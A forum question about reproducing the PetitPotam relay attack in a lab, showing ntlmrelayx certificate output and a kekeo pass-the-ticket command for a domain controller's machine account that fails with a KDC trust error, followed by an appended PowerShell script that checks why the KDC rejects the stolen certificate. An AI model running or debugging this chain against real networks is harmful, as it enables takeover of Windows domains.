active directory – Trying to reproduce petitpotam exploit, got “KDC_ERROR_CLIENT_NOT_TRUSTED (62)” error

I’m following this article to reproduce the EFS bug:

My environment:

  1. Windows 2016 AD (Hostname: W2016$)
  2. Windows 2016 SRV01 (Running AD CS service)
  3. Windows 2016 SRV02 (Attack machine)

I’ve successfully generated the certificate with ntlmrelayx:

(*) Skipping user W2016$ since attack was already performed
(*) Base64 certificate of user W2016$:

Then I logged in to SRV02 with a low-privilege user. When I pass the ticket in kekeo, it results in a KDC_ERROR_CLIENT_NOT_TRUSTED error:

# tgt::ask /pfx:xxx /user:W2016$ / /ptt

Realm        : (corp)
User         : W2016$ (W2016$)
CName        : W2016$   (KRB_NT_PRINCIPAL (1))
SName        : krbtgt/    (KRB_NT_SRV_INST (2))
Need PAC     : Yes
Auth mode    : RSA
(kdc) name: (auto)
(kdc) addr: (auto)

Does anyone know what’s wrong here?
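As an added example (not part of the question above or of any answer to it), the following PowerShell inspects a PFX for the properties a Windows KDC verifies before it accepts a certificate for PKINIT, which are the usual reasons it answers KDC_ERR_CLIENT_NOT_TRUSTED (62): a client-authentication EKU, a SAN that maps to the account, a chain to a trusted root, and an issuing CA that is present in the enterprise NTAuthCertificates store. The PFX path `.\W2016.pfx`, the empty password, and running the script on a domain-joined host (ideally the DC itself, so `certutil` sees the same NTAuth store the KDC uses) are assumptions; the English `Cert Hash(sha1)` label in the certutil output is also assumed.

```powershell
param(
    [string]$PfxPath = '.\W2016.pfx',  # assumed location of the PFX saved from ntlmrelayx
    [string]$PfxPassword = ''          # assumed: ntlmrelayx writes an unprotected PFX
)

# Load the certificate and its private key from the PFX.
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($PfxPath, $PfxPassword)
Write-Host "Subject : $($cert.Subject)"
Write-Host "Issuer  : $($cert.Issuer)"
Write-Host "Valid   : $($cert.NotBefore) -> $($cert.NotAfter) (now: $(Get-Date))"

# 1. EKU: the KDC accepts Client Authentication, Smart Card Logon or the PKINIT client OID.
#    A certificate with no EKU extension at all is valid for every purpose, so that passes too.
$pkinitEkus = @('1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '1.3.6.1.5.2.3.4')
$ekuExt = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.37' }
if ($ekuExt) {
    $ekus  = $ekuExt.EnhancedKeyUsages | ForEach-Object { $_.Value }
    $ekuOk = @($ekus | Where-Object { $pkinitEkus -contains $_ }).Count -gt 0
    Write-Host "EKU     : $($ekus -join ', ') -> $(if ($ekuOk) { 'OK' } else { 'MISSING client-auth EKU' })"
} else {
    Write-Host "EKU     : (none, any purpose) -> OK"
}

# 2. SAN: the KDC maps the certificate to an account through the UPN or DNS name in the SAN
#    (for a computer account, a DNS name matching its dNSHostName).
$sanExt = $cert.Extensions | Where-Object { $_.Oid.Value -eq '2.5.29.17' }
if ($sanExt) {
    Write-Host "SAN     :`n$($sanExt.Format($true))"
} else {
    Write-Host "SAN     : (absent) -> nothing to map to an account"
}

# 3. Chain: does this host chain the certificate to a trusted root? Revocation is skipped here;
#    the KDC does check it, so an unreachable CRL is a separate failure mode to rule out.
$chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
$chain.ChainPolicy.RevocationMode = [System.Security.Cryptography.X509Certificates.X509RevocationMode]::NoCheck
$built  = $chain.Build($cert)
$status = ($chain.ChainStatus | ForEach-Object { $_.StatusInformation.Trim() }) -join '; '
Write-Host "Chain   : $(if ($built) { 'builds to a trusted root' } else { "FAILS: $status" })"
# Every element above the leaf is a CA the KDC must know.
$caThumbprints = $chain.ChainElements | Select-Object -Skip 1 | ForEach-Object { $_.Certificate.Thumbprint }

# 4. NTAuth: a Windows KDC only trusts PKINIT certificates whose issuing CA is in the enterprise
#    NTAuthCertificates store. certutil dumps the store as text; pull out the SHA1 hashes and
#    compare them with the thumbprints of the CAs in the chain.
$ntauthDump = & certutil -enterprise -store NTAuth 2>&1 | Out-String
$ntauth = [regex]::Matches($ntauthDump, 'Cert Hash\(sha1\):\s*([0-9a-fA-F ]+)') |
          ForEach-Object { ($_.Groups[1].Value -replace '\s', '').ToUpperInvariant() }
foreach ($tp in $caThumbprints) {
    $verdict = if ($ntauth -contains $tp) { 'in NTAuth' } else { 'NOT in NTAuth -> KDC will not trust certificates from this CA' }
    Write-Host "CA $tp : $verdict"
}
```

Run it on the DC against the PFX that kekeo is given; each of the four lines that reports a failure is a reason the KDC can refuse the certificate before it ever reaches the account-mapping stage, so fix those before looking at kekeo's own options.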